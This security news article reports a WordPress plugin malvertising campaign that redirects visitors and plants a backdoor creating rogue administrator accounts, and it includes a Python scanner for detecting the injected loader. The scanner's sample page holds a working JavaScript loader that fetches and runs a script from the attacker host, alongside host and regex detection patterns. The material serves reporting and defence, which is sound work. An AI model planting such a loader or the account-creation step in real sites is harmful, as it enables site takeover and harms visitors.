WordPress Plugins Anchor Widespread Malvertising, Rogue Backdoor Campaign


An ongoing attack on websites has added new exploits and an administrative backdoor to its bag of tricks.

A malvertising campaign redirecting website visitors and surfacing popups is plaguing the WordPress ecosystem, according to researchers, using known vulnerabilities in WordPress plugins as the attack vector.

The campaign has been ongoing all summer, with cybercrooks bent on redirecting website visitors to malware and fraud sites, according to researchers at Wordfence. They’re targeting vulnerable websites running outdated WordPress plugin versions and injecting malicious JavaScript into the front end to perform the redirects. Recently, however, new exploits have been added to the attackers’ repertoire, widening the scope of the campaign, and they have begun installing persistent backdoors on compromised sites.

The plugins being targeted include Bold Page Builder; Blog Designer; Live Chat with Facebook Messenger; Yuzo Related Posts; Visual CSS Style Editor; WP Live Chat Support; Form Lightbox; Hybrid Composer; and all former NicDark plugins (nd-booking, nd-travel, nd-learning and so on). Some of these have updated; others, like Yuzo Related Posts, have been removed from the WordPress.org repository and are no longer supported by their developers.

“The campaign picks up new targets over time. It’s reasonable to assume any unauthenticated cross-site scripting (XSS) or options update vulnerabilities disclosed in the near future will be quickly targeted by this threat actor,” said Mike Veenstra, writing in a blog post over the weekend. In fact, he noted that a flaw in the Bold Page Builder plugin was disclosed in August, and an exploit for it was added to the malvertising attack the next day.

As for the backdoor, the adversaries are exploiting administrator sessions to install an additional script into the website code.

“A short JavaScript block generates a new <script> tag on affected pages, sets its src parameter to https://yourservice.live/include.js, then executes it,” Veenstra explained. “The code contained in include.js is responsible for attempting to create a new user with administrator privileges on the victim’s site.”

Specifically, it executes a function called checkmeone() in order to test if a logged-in administrator is viewing the compromised page.

“If the user is presented with a _wpnonce_create-user nonce when visiting the site’s wp-admin/user-new.php endpoint, then the script knows a new user can be created,” said Veenstra. “If this is the case, the putmeone() function is triggered. This function makes an AJAX call via jQuery which creates the rogue administrator account.”

With that account set up, the attacker has free run of the site to install malware, change other code, deface the site or perform any other malicious activity.
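The loader Veenstra describes (an inline block that creates a new script element, points it at https://yourservice.live/include.js and runs it) is something a site owner can check for in rendered page HTML. The scanner below is an added example, not Wordfence’s or Threatpost’s code: it flags any script reference to the indicator host named above, and, as a broader heuristic, any inline dynamic loader that pulls a script from a host other than the site itself. The sample page, the site host example.org and the second external host are constructed.

```python
"""Scan rendered WordPress page HTML for an injected external script loader."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

KNOWN_BAD_HOSTS = {"yourservice.live"}  # indicator host from the Wordfence write-up


class ScriptCollector(HTMLParser):
    """Gathers external <script src> values and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
# Dynamic loader heuristic: a script element is created and its src assigned in one block.
LOADER_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\).*?\.src\s*=", re.I | re.S)


def scan_page(html, site_host):
    """Return (reason, url) findings for known-bad hosts and external dynamic loaders."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        if (urlparse(src).hostname or "") in KNOWN_BAD_HOSTS:
            findings.append(("known-bad script src", src))
    for body in parser.inline:
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname or ""
            if host in KNOWN_BAD_HOSTS:
                findings.append(("known-bad host in inline script", url))
            elif LOADER_RE.search(body) and host != site_host:
                findings.append(("dynamic loader to external host", url))
    return findings


# Constructed sample: a normal page (site host example.org) with the described loader appended.
SAMPLE = """<html><head><script src="https://example.org/wp-includes/js/jquery.js"></script>
<script>var s=document.createElement('script');s.src='https://yourservice.live/include.js';
document.head.appendChild(s);</script></head><body>hello</body></html>"""

if __name__ == "__main__":
    for reason, url in scan_page(SAMPLE, "example.org"):
        print(reason, url)
```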

The malvertising campaign is being launched from a single IP address belonging to a Rackspace server – most likely a legitimate webserver that has been compromised, Veenstra said. He added that Wordfence contacted Rackspace about the issue.

“At the time of this writing, attacks associated with this campaign are still ongoing,” Veenstra said. “We are continuing to track exploitation of new vulnerabilities, which may provide us with more unique payloads.”

Plugins continue to be an attractive attack surface for WordPress’ attackers. According to an Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins, which extend the functionality and features of a website or a blog.
